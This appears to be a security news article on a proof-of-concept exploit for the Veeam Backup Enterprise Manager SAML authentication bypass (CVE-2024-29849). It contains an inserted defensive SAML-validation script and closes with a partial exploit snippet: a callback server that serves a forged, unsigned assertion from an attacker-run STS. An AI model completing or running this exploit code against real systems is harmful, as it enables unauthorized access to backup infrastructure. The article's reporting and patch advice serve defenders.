PoC Exploit released for Veeam flaw CVE-2024-29849

A proof-of-concept exploit has been released for a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager tracked as CVE-2024-29849.

The vulnerability resides in the Veeam.Backup.Enterprise.RestAPIService.exe, a REST API server component of the Veeam Backup Enterprise Manager software. This service listens on TCP port 9398 and serves as an API version of the main web application, which operates on TCP port 9443.

The exploit involves crafting a malicious SAML assertion and sending it to the vulnerable Veeam service. The SAML assertion is designed to trick the service into validating the token and granting access to the attacker.
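The bypass described above works because the consuming service accepts an assertion without tying it to an issuer it actually trusts. The following is an added, illustrative example (not Veeam's code and not part of the PoC) of the gate checks a SAML token consumer must apply before it honors an assertion: issuer allow-list, presence of an XML signature, validity window, and audience. The trusted issuer, audience, timestamps and all three sample assertions are constructed for the example; the first sample mirrors the shape of the unsigned assertion served by the PoC callback server. Note that the signature check here only confirms a Signature element exists; cryptographic verification against the trusted IdP certificate must still be done by a signature-verification library before the token is accepted.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timezone
from typing import Optional, Tuple

NS = {
    "saml2": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}

# Assumed configuration (constructed values): the identity providers this
# service has been told to trust, and the audience it expects in tokens.
TRUSTED_ISSUERS = {"https://idp.example.internal/STSService"}
EXPECTED_AUDIENCE = "https://backup.example.internal/"

# Fixed clock so the validity-window check is deterministic (constructed).
FIXED_NOW = datetime(2024, 6, 1, 0, 0, 0, tzinfo=timezone.utc)


def check_assertion(xml_text: str, now: Optional[datetime] = None) -> Tuple[bool, str]:
    """Return (accepted, reason). Every gate must pass before the token is trusted."""
    now = now or datetime.now(timezone.utc)
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return False, f"malformed XML: {exc}"

    # 1. The document must actually be a SAML 2.0 Assertion.
    if root.tag != f"{{{NS['saml2']}}}Assertion":
        return False, "root element is not a SAML 2.0 Assertion"

    # 2. The issuer must be one we were configured to trust; an attacker-run
    #    STS that simply claims its own token is "valid" fails here.
    issuer = root.findtext("saml2:Issuer", default="", namespaces=NS).strip()
    if issuer not in TRUSTED_ISSUERS:
        return False, f"untrusted issuer {issuer!r}"

    # 3. An unsigned assertion is never acceptable. (Presence only; the
    #    signature itself must still be verified against the IdP certificate.)
    if root.find("ds:Signature", NS) is None:
        return False, "assertion is unsigned"

    # 4. Validity window and audience restriction.
    conditions = root.find("saml2:Conditions", NS)
    if conditions is None:
        return False, "missing Conditions"
    not_after = conditions.get("NotOnOrAfter")
    if not_after is None:
        return False, "assertion has no NotOnOrAfter"
    if datetime.fromisoformat(not_after.replace("Z", "+00:00")) <= now:
        return False, "assertion expired"
    audiences = [
        a.text.strip()
        for a in conditions.findall("saml2:AudienceRestriction/saml2:Audience", NS)
        if a.text
    ]
    if EXPECTED_AUDIENCE not in audiences:
        return False, "audience mismatch"

    return True, "issuer, signature presence, validity window and audience checks passed"


# Constructed sample 1: unsigned assertion from an untrusted issuer, shaped
# like the one the PoC callback server returns.
ROGUE_ASSERTION = """<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
  <saml2:Issuer>https://attacker.example/STSService</saml2:Issuer>
  <saml2:Status><saml2:StatusCode Value="urn:example:valid"/></saml2:Status>
</saml2:Assertion>"""

# Constructed sample 2: trusted issuer, but no signature.
UNSIGNED_TRUSTED = """<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
  <saml2:Issuer>https://idp.example.internal/STSService</saml2:Issuer>
  <saml2:Conditions NotOnOrAfter="2024-06-01T01:00:00Z">
    <saml2:AudienceRestriction><saml2:Audience>https://backup.example.internal/</saml2:Audience></saml2:AudienceRestriction>
  </saml2:Conditions>
</saml2:Assertion>"""

# Constructed sample 3: passes all gates (signature value is a placeholder).
VALID_ASSERTION = """<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"
                 xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
  <saml2:Issuer>https://idp.example.internal/STSService</saml2:Issuer>
  <ds:Signature><ds:SignatureValue>PLACEHOLDER</ds:SignatureValue></ds:Signature>
  <saml2:Conditions NotOnOrAfter="2024-06-01T01:00:00Z">
    <saml2:AudienceRestriction><saml2:Audience>https://backup.example.internal/</saml2:Audience></saml2:AudienceRestriction>
  </saml2:Conditions>
</saml2:Assertion>"""

if __name__ == "__main__":
    for name, doc in [("rogue", ROGUE_ASSERTION), ("unsigned", UNSIGNED_TRUSTED), ("valid", VALID_ASSERTION)]:
        print(name, check_assertion(doc, now=FIXED_NOW))
```

Run stand-alone, the script rejects the first two samples (untrusted issuer, missing signature) and accepts only the third. The ordering of the gates matters for diagnostics only; all of them are mandatory, and a consumer that skips the issuer allow-list is the one an attacker-operated STS can satisfy.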

The exploit script, written in Python, automates this process and includes a callback server to handle the malicious SAML assertion.

By exploiting this vulnerability, an attacker can gain unauthorized access to sensitive data and systems, leading to potential data breaches and other security incidents.

Veeam recommends updating immediately to the latest patched version of the software to address this vulnerability.

Below is a snippet of the PoC code:

from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl
import warnings
import base64
import requests
from urllib.parse import urlparse
from threading import Thread
import os

warnings.filterwarnings("ignore", category=DeprecationWarning)
requests.packages.urllib3.disable_warnings()


class CustomHandler(SimpleHTTPRequestHandler):
    # Callback handler: answers the service's SAML request with the crafted assertion
    def do_POST(self):
        xml_response = '''<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
                            <saml2:Issuer>https://192.168.253.1/STSService</saml2:Issuer>
                            <saml2:Status>
                                <saml2:StatusCode Value="http://docs.oasis-open.org/ws-sx/ws-trust/200512/status/valid"/>
                            </saml2:Status>
                          </saml2:Assertion>'''
        self.send_response(200)
        self.send_header("Content-type", "text/xml")
        self.end_headers()
        self.wfile.write(xml_response.encode("utf-8"))
        print("(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType")


def start_callback_server(ip, port):
    # HTTPS callback server using a local certificate/key pair (server.pem, key.pem)
    httpd = HTTPServer((ip, port), CustomHandler)
    ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ssl_context.load_cert_chain("server.pem", keyfile="key.pem")
    httpd.socket = ssl_context.wrap_socket(httpd.socket, server_side=True)
    print(f"(*) Callback server listening on https://{ip}:{port}")
    httpd.serve_forever()

# Additional code for exploit execution...